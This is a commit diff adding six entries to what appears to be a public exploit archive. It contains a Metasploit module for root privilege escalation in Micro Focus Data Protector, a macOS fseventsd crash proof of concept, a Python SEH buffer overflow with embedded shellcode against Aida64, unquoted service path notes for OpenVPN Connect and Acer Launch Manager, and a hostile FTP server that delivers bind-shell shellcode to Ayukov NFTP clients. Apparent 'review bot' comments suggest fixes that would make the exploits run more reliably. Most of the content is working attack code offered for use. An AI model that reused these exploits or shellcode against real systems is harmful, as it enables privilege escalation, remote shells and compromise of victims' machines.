DB: 2019-11-05

6 changes to exploits/shellcodes

Apple macOS 10.15.1 - Denial of Service (PoC)
Aida64 6.10.5200 - Buffer Overflow (SEH)
OpenVPN Connect 3.0.0.272 - 'agent_ovpnconnect' Unquoted Service Path
Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path
Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)

Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
Offensive Security 2019-11-05 05:01:42 +00:00
parent 47d2a76f4f
commit 577557762c
7 changed files with 695 additions and 0 deletions

134
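--- a/exploits/linux/local/47580.rb
+++ b/exploits/linux/local/47580.rb
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Local
+Rank = ExcellentRanking
+include Msf::Post::File
+include Msf::Post::Linux::Priv
+include Msf::Post::Linux::System
+include Msf::Exploit::EXE
+include Msf::Exploit::FileDropper
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
+'Description' => %q{
+This module exploits the trusted `$PATH` environment
+variable of the SUID binary `omniresolve` in
+Micro Focus (HPE) Data Protector A.10.40 and prior.
+The `omniresolve` executable calls the `oracleasm` binary using
+a relative path and the trusted environment `$PATH`, which allows
+an attacker to execute a custom binary with `root` privileges.
+This module has been successfully tested on:
+HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
+Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
+The vulnerability has been patched in:
+Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'s7u55', # Discovery and Metasploit module
+],
+'DisclosureDate' => '2019-09-13',
+'Platform' => [ 'linux' ],
+'Arch' => [ ARCH_X86, ARCH_X64 ],
+'SessionTypes' => [ 'shell', 'meterpreter' ],
+'Targets' =>
+[
+[
+'Micro Focus (HPE) Data Protector <= 10.40 build 118',
+upper_version: Gem::Version.new('10.40')
+]
+],
+'DefaultOptions' =>
+{
+'PrependSetgid' => true,
+'PrependSetuid' => true
+},
+'References' =>
+[
+[ 'CVE', '2019-11660' ],
+[ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
+]
+))
+register_options(
+[
+OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
+])
+register_advanced_options(
+[
+OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
+OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+])
+end
+def base_dir
+datastore['WritableDir'].to_s
+end
+def suid_bin_path
+datastore['SUID_PATH'].to_s
+end
+def check
+unless setuid? suid_bin_path
+vprint_error("#{suid_bin_path} executable is not setuid")
+return CheckCode::Safe
+end
+info = cmd_exec("#{suid_bin_path} -ver").to_s
+if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
+version = '%.2f' % $1.to_f
+build = $3.to_i
+vprint_status("omniresolve version #{version} build #{build}")
+unless Gem::Version.new(version) < target[:upper_version] ||
+(Gem::Version.new(version) == target[:upper_version] && build <= 118)
+return CheckCode::Safe
+end
+return CheckCode::Appears
+end
+vprint_error("Could not parse omniresolve -ver output")
+CheckCode::Detected
+end
+def exploit
+if check == CheckCode::Safe
+unless datastore['ForceExploit']
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+end
+print_warning 'Target does not appear to be vulnerable'
+end
+if is_root?
+unless datastore['ForceExploit']
+fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+end
+end
+unless writable?(base_dir)
+fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+end
+payload_path = File.join(base_dir, 'oracleasm')
+register_file_for_cleanup(payload_path)
+write_file(payload_path, generate_payload_exe)
+chmod(payload_path)
+trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+register_file_for_cleanup(trigger_path)
+write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
+cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
+end
+end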
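Review bot: `check` pulls the version and build out of the `-ver` output through the Perl-style globals `$1` and `$3`, which the Ruby style guide discourages because the numbering silently shifts whenever a group is added or removed (the middle `(.*)` group is captured here but never read). `Regexp.last_match(1)` and `Regexp.last_match(3)` say the same thing explicitly, and named captures remove the counting altogether: `if (m = info.match(/(?<=\w\.)(?<version>\d\d\.\d\d).*(?<=build )(?<build>\d\d\d)/))` followed by `m[:version]` and `m[:build]`. The `'%.2f' % $1.to_f` round trip through Float only strips a leading zero ("09.07" becomes "9.07"); as far as I can tell `Gem::Version` orders both spellings identically, so that line either wants a comment saying why the normalisation is there or can use the capture directly.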

237
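--- a/exploits/macos/dos/47578.c
+++ b/exploits/macos/dos/47578.c
@@ -0,0 +1,237 @@
+# Exploit Title: Apple macOS 10.15.1 - Denial of Service (PoC)
+# Date: 2019-11-02
+# Exploit Author: 08Tc3wBB
+# Vendor Homepage: Apple
+# Software Link:
+# Version: Apple macOS < 10.15.1 / iOS < 13.2
+# Tested on: Tested on macOS 10.14.6 and iOS 12.4.1
+# CVE : N/A
+# Type : DOS
+# https://support.apple.com/en-us/HT210721
+----- Execution file path:
+/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd
+fseventsd running as root and unsandboxed on both iOS and macOS, and accessible from within the Application sandbox.
+----- Analysis
+Env: macOS 10.14.6
+I named following pseudocode functions to help you understand the execution flow.
+void __fastcall routine_1(mach_msg_header_t *msg, mach_msg_header_t *reply) // 0x100001285
+{
+...
+v9 = implementation_register_rpc(
+msg->msgh_local_port,
+msg[1].msgh_size,
+msg[4].msgh_reserved,
+(unsigned int)msg[4].msgh_id,
+*(_QWORD *)&msg[1].msgh_reserved, // input_mem1
+msg[2].msgh_size >> 2, // input_mem1_len
+*(_QWORD *)&msg[2].msgh_remote_port, // input_mem2
+msg[2].msgh_id, // input_mem2_len
+msg[5].msgh_remote_port,
+*(_QWORD *)&msg[3].msgh_bits, // input_mem3
+msg[3].msgh_local_port >> 2, // input_mem3_len
+*(_QWORD *)&msg[3].msgh_reserved, // input_mem4
+msg[4].msgh_size); // input_mem4_len
+...
+}
+routine_1 will be executed when user send mach_msg to Mach Service "com.apple.FSEvents" with id 0x101D0
+And routine_1 internally invokes a function called fsevent_add_client to process data included in input_mem1/input_mem2
+I marked five places with: (1) (2) (3) (4) (5)
+These are the essential points cause this vulnerability.
+void *fsevent_add_client(...)
+{
+...
+v25 = malloc(8LL * input_mem1_len); // (1) Allocate a new buffer with input_mem1_len, didn't initializing its content.
+*(_QWORD *)(eventobj + 136) = v25; // Subsequently insert that new buffer into (eventobj + 136)
+...
+v20 = ... // v20 point to an array of strings that was created based on user input
+// The following process is doing recursive parsing to v20
+index = 0LL;
+while ( 1 )
+{
+v26 = *(const char **)(v20 + 8 * index);
+...
+v28 = strstr(*(const char **)(v20 + 8 * index), "/.docid");
+v27 = v26;
+if ( !v28 ) // (2) If input string doesn't contain "/.docid", stop further parse, go straight to strdup
+goto LABEL_15;
+if ( strcmp(v28, "/.docid") ) // (3) If an input string doesn't exactly match "/.docid", goto LABEL_16
+goto LABEL_16;
+*(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(".docid");
+LABEL_17:
+if ( ++index >= input_mem1_len )
+goto LABEL_21;
+}
+v27 = *(const char **)(v20 + 8 * index);
+LABEL_15:
+*(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(v27);
+LABEL_16:
+if ( *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) )
+goto LABEL_17; // (4) So far the new buffer has never been initialized, but if it contain any wild value, it will goto LABEL_17, which program will retain that wild value and go on to parse next input_string
+...
+// (5) Since all values saved in the new buffer supposed to be the return value of strdup, they will all be free'd later on. So if spray works successfully, the attacker can now has the ability to call free() on any address, further develop it to modify existing memory data.
+}
+However there is a catch, fseventsd only allow input_mem1_len be 1 unless the requested proc has root privilege, led to the size of uninitialized buffer can only be 8, such small size caused it very volatile, hard to apply desired spray work unless discover something else to assist. Or exploit another system proc (sandboxed it's okay), and borrow their root credential to send the exploit msg.
+----- PoC
+// clang poc.c -framework CoreFoundation -o poc
+#include <stdio.h>
+#include <xpc/xpc.h>
+#include <CoreFoundation/CoreFoundation.h>
+#include <bootstrap.h>
+mach_port_t server_port = 0;
+mach_port_t get_server_port(){
+if(server_port)
+return server_port;
+bootstrap_look_up(bootstrap_port, "com.apple.FSEvents", &server_port);
+return server_port;
+}
+int trigger_bug = 0;
+int has_reach_limit = 0;
+uint32_t call_routine_1(){
+struct SEND_Msg{
+mach_msg_header_t Head;
+mach_msg_body_t msgh_body;
+mach_msg_port_descriptor_t port;
+mach_msg_ool_descriptor_t mem1;
+mach_msg_ool_descriptor_t mem2;
+mach_msg_ool_descriptor_t mem3;
+mach_msg_ool_descriptor_t mem4;
+// Offset to here : +104
+uint64_t unused_field1;
+uint32_t input_num1; // +112
+uint32_t input_num2; // +116
+uint64_t len_auth1; // +120 length of mem1/mem2
+uint32_t input_num3; // +128
+uint64_t len_auth2; // +132 length of mem3/mem4
+char unused_field[20];
+};
+struct RECV_Msg{
+mach_msg_header_t Head; // Size: 24
+mach_msg_body_t msgh_body;
+mach_msg_port_descriptor_t port;
+uint64_t NDR_record;
+};
+struct SEND_Msg *msg = malloc(0x100);
+bzero(msg, 0x100);
+msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND);
+msg->Head.msgh_size = 160;
+int kkk = get_server_port();
+msg->Head.msgh_remote_port = kkk;
+msg->Head.msgh_local_port = mig_get_reply_port();
+msg->Head.msgh_id = 0x101D0;
+msg->msgh_body.msgh_descriptor_count = 5;
+msg->port.type = MACH_MSG_PORT_DESCRIPTOR;
+msg->mem1.deallocate = false;
+msg->mem1.copy = MACH_MSG_VIRTUAL_COPY;
+msg->mem1.type = MACH_MSG_OOL_DESCRIPTOR;
+memcpy(&msg->mem2, &msg->mem1, sizeof(msg->mem1));
+memcpy(&msg->mem3, &msg->mem1, sizeof(msg->mem1));
+memcpy(&msg->mem4, &msg->mem1, sizeof(msg->mem1));
+mach_port_t port1=0;
+mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port1);
+msg->port.name = port1;
+msg->port.disposition = MACH_MSG_TYPE_MAKE_SEND;
+uint64_t empty_data = 0;
+if(trigger_bug){
+msg->input_num1 = 5;
+msg->mem1.address = &empty_data;
+msg->mem1.size = 4;
+msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
+msg->mem2.address = "/.docid1";
+msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
+}
+else{
+msg->input_num1 = 1;
+msg->mem1.address = &empty_data;
+msg->mem1.size = 4;
+msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
+msg->mem2.address = "/.dacid1";
+msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
+}
+msg->mem3.address = 0;
+msg->mem3.size = 0;
+msg->input_num3 = msg->mem3.size >> 2; // input_mem3_len_auth
+msg->mem4.address = 0;
+msg->mem4.size = 0;
+msg->len_auth1 = ((uint64_t)msg->mem2.size << 32) | (msg->mem1.size >> 2);
+msg->len_auth2 = ((uint64_t)msg->mem4.size << 32) | (msg->mem3.size >> 2);
+mach_msg((mach_msg_header_t*)msg, MACH_SEND_MSG|(trigger_bug?0:MACH_RCV_MSG), msg->Head.msgh_size, 0x100, msg->Head.msgh_local_port, 0, 0);
+int32_t errCode = *(int32_t*)(((char*)msg) + 0x20);
+if(errCode == -21){
+has_reach_limit = 1;
+}
+mig_dealloc_reply_port(msg->Head.msgh_local_port);
+struct RECV_Msg *recv_msg = (void*)msg;
+uint32_t return_port = recv_msg->port.name;
+free(msg);
+return return_port;
+}
+int main(int argc, const char * argv[]) {
+printf("PoC started running...\n");
+uint32_t aaa[1000];
+for(int i=0; i<=1000; i++){
+if(has_reach_limit){
+trigger_bug = 1;
+call_routine_1();
+break;
+}
+aaa[i] = call_routine_1();
+}
+printf("Finished\n");
+printf("Check crash file beneath /Library/Logs/DiagnosticReports/\n");
+return 0;
+}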
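Review bot: In `main`, `uint32_t aaa[1000]` is filled by a loop whose condition is `i <= 1000`, so the final iteration stores to `aaa[1000]`, one element past the end of the array; the bound should read `for(int i=0; i<1000; i++){`. The `break` taken once `has_reach_limit` is set will normally end the loop earlier, but the off-by-one is still a latent stack write in the harness itself. The `kern_return_t` results of `bootstrap_look_up` in `get_server_port` and of `mach_msg` in `call_routine_1` are never inspected either, so a failed lookup silently continues with `server_port` still 0 and the closing `Finished` message prints whether or not anything was actually sent; checking those returns (and printing the error) would make the PoC's output meaningful.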

70
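--- a/exploits/windows/local/47574.py
+++ b/exploits/windows/local/47574.py
@@ -0,0 +1,70 @@
+# Exploit Title: Aida64 6.10.5200 - Buffer Overflow (SEH)
+# Date: 2019-10-28
+# Exploit Author: 8-Team / daejinoh
+# Vendor Homepage: https://www.aida64.com
+# Software Link: https://www.aida64.com/downloads/OTAwMmVmNTE=
+# Version: AIDA64 Enginner 6.10.5200
+# Tested on: Windows 7 Home Basic SP1
+# CVE : N/A
+# Step
+1) File -> Preferences -> Logging -> Log sensor readings to CSV log file
+2) Paste payload from "aida64.txt" -> Apply
+3) File -> Exit
+# Exploit Code
+#! Python
+import struct
+# shell code
+buf = ""
+buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"
+buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"
+buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"
+buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"
+buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"
+buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"
+buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"
+buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"
+buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"
+buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"
+buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"
+buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"
+buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"
+buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"
+buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"
+buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"
+buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"
+buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"
+buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"
+buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"
+buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"
+buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"
+buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"
+buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"
+buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"
+buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"
+buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"
+buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"
+buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"
+buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"
+buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"
+buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"
+buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"
+buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"
+buf += "\x76\x74\x33\x79\x76\x35\x41\x41"
+# Exploit Payload
+sehNext = struct.pack('<L',0x909010EB) # SHORT JMP
+sehHandler = struct.pack('<L',0x0120c8b6) # POP POP RET
+payload = 'A' * (1115 - 4) + sehNext + sehHandler + "\x90" * 16 + buf +"B"*1000
+f = open("aida64.txt", "wb")
+f.write(payload)
+f.close()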
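Review bot: The three numbered lines under `# Step` (`1) File -> Preferences ...` through `3) File -> Exit`) are bare prose rather than comments, so the interpreter raises a SyntaxError on them before `import struct` is reached; each needs a leading `#`. The script is also Python 2 only — `payload` concatenates `str` from `'A' * (1115 - 4)` with the `bytes` returned by `struct.pack`, which is a `TypeError` on Python 3 — and `#! Python` is not a usable interpreter line, so `#!/usr/bin/env python2` plus a "Python 2" line in the header would spare the next reader a failed run. The file handling reads better as `with open("aida64.txt", "wb") as f:` / `    f.write(payload)`, which also closes the file if the write raises.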


@ -0,0 +1,34 @@
# Exploit Title: OpenVPN Connect 3.0.0.272 - 'ovpnagent' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-03
# Vendor Homepage: https://openvpn.net
# Software Link : https://openvpn.net/downloads/openvpn-connect-v3-windows.msi
# Tested Version: 3.0.0.(272)
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """
OpenVPN Agent agent_ovpnconnect agent_ovpnconnect C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe Auto
# Service info:
C:\>sc qc agent_ovpnconnect
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: agent_ovpnconnect
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OpenVPN Agent agent_ovpnconnect
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.


@ -0,0 +1,38 @@
# Title: Launch Manager 6.1.7600.16385 'DsiWMIService' Unquoted Service Path
# Author: Gustavo Briseño
# Date: 2019-11-03
# Vendor Homepage: https://www.acer.com/
# Software Link: https://global-download.acer.com/GDFiles/Application/LaunchManager/LaunchManager_Dritek_6.1.7600.16385_W7x86W7x64_A.zip?acerid=634193506101268520&Step1=NOTEBOOK&Step2=ASPIRE&Step3=ASPIRE%204333&OS=ALLLC=es&BC=ACER&SC=PA_2#_ga=2.248825730.460116227.1572829430-701800474.1572829429
# Version : Launch Manager 6.1.7600.16385
# Tested on: Windows 7 Home Basic 64bit
# CVE : N/A
# =====================================================
# 1. Description:
# Unquoted service paths in DsiWMIService have an unquoted service path.
#PoC
===========
C:\>sc qc DsiWMIService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DsiWMIService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Launch Manager\dsiwmis.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Dritek WMI Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>
#Exploit:
============
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.

176
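--- a/exploits/windows/remote/47576.py
+++ b/exploits/windows/remote/47576.py
@@ -0,0 +1,176 @@
+# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
+# Date: 2019-11-03
+# Exploit Author: Chase Hatch (SYANiDE)
+# Vendor Homepage: http://ayukov.com/nftp/
+# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
+# Version: 1.71
+# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
+# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
+# Steps to reproduce:
+# Run the server with the valid Windows version
+# Connect the client to the malicious server
+# bind shell on port 5150
+#!/usr/bin/env python2
+import os, sys, socket
+NARGS = len(sys.argv)
+# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
+# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
+# 7C923A95 FFD6 CALL ESI # Windows XP Pro SP3; ntdll.dll
+# 7C927543 FFD6 CALL ESI # Windows XP Pro SP2; ntdll.dll
+# 77E641C7 FFE6 JMP ESI # Windows XP Pro SP1; kernel32.dll
+# 77E667F3 FFE6 JMP ESI # Windows XP Pro SP0: kernel32.dll
+tourRETs = {
+"XPProSP3": "\x95\x3A\x92\x7c",
+"XPProSP2": "\x43\x75\x92\x7C",
+"XPProSP1": "\xc7\x41\xe6\x77",
+"XPProSP0": "\xf3\x67\xe6\x77"
+}
+if not NARGS > 1:
+print("USAGE: %s version" % sys.argv[0])
+print("[.] version must be in:")
+for item in tourRETs:
+print("\t%s" % item)
+sys.exit(1)
+# sploit = "A"*5000 # crash! in SYST cmd, 41414141 in EIP and EBP
+# ESP and ESI both pointers to somewhere in the As
+# If I increase the overflow string to 10000, the area ESP points to at crash
+#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
+# sploit = "A"*10000
+# sploit = sys.argv[1] # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP
+# `locate pattern_offset.rb |head -n 1` 46326846 10000 # 4116
+sploit = "A"*4116
+# Add the return address
+try:
+sploit += tourRETs[sys.argv[1]]
+except KeyError, x:
+print("[!] Version %s: not a valid version! Possibly bad capitalization" % str(x))
+sys.exit(1)
+sploit += ("\x90"*12) # original calcs based on RET*4... oops. realign.
+# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc # 0x69D (1693); ESP-ESI
+sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs
+# badchars = "\x00\x0a\x0d"
+# locate EIP and align ESP to a close future 4 and 16 byte boundary
+NOTES = """\
+$-37 > D9EE FLDZ
+$-35 > D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
+$-31 > 59 POP ECX
+$-30 > 80C1 09 ADD CL,9
+$-2D > 80C1 04 ADD CL,4
+$-2A > 80C1 2A ADD CL,2A
+$-27 > 80C5 01 ADD CH,1
+$-24 > 51 PUSH ECX
+$-23 > 5C POP ESP
+"""
+sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes
+sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes
+sploit += "\x90" * 0x22 # ESP = EIP
+sploit += "\x90" * 20 # sled for shikata_ga_nai unpack
+# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process
+# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
+sploit += (
+"\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
+"\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"
+"\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"
+"\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"
+"\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"
+"\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"
+"\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"
+"\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"
+"\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"
+"\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"
+"\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"
+"\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"
+"\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"
+"\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"
+"\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"
+"\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"
+"\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"
+"\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"
+"\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"
+"\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"
+"\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"
+"\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"
+"\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"
+"\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"
+) # 355
+sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)
+cases = {
+"USER": "331 user OK. Pass required",
+"PASS": "230 OK, current directory is /",
+# "SYST": "215 UNIX Type: L8",
+"SYST": sploit, # CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP
+"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
+"SITE UMASK": "500 SITE UMASK is an unknown extension",
+"CWD": "250 OK, current directory whatever you think it is",
+"PORT": "200 PORT command successful",
+"PASV": "227 Entering PASV mode",
+"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
+}
+sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+sx.bind(("192.168.56.181",21))
+sx.listen(5)
+print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
+cx,addr = sx.accept()
+print("[!] Connection received from %s" % str(addr))
+cx.send("220 HostileFTPd v0.0 alpha !\r\n")
+notified = 0
+while True:
+req = cx.recv(1024)
+for key, resp in cases.items():
+if key in req:
+cx.send(resp + "\r\n")
+if "SITE UMASK" in req and notified == 0:
+print("[!] Buffer sent. Bind shell on client's port 5150?")
+notified = 1
+if "PASV" in req:
+justpause = raw_input("[.] PASV received. Pausing recv buffer")
+NOTES="""\
+### followed TCP stream in normal client connect to ftp server
+220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
+220-You are user number 1 of 50 allowed.
+220-Local time is now 13:47. Server port: 21.
+220-This is a private system - No anonymous login
+220-IPv6 connections are also welcome on this server.
+220 You will be disconnected after 15 minutes of inactivity.
+USER bozo
+331 User bozo OK. Password required
+PASS theclown
+230-User bozo has group access to: 1003
+230 OK. Current directory is /
+SYST
+215 UNIX Type: L8
+TYPE I
+200 TYPE is now 8-bit binary
+SITE UMASK 022
+500 SITE UMASK is an unknown extension
+CWD /
+250 OK. Current directory is /
+PASV
+227 Entering Passive Mode (192,168,56,181,183,29)
+LIST -a
+150 Accepted data connection
+226-ASCII
+226-Options: -a -l
+226 3 matches total
+"""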


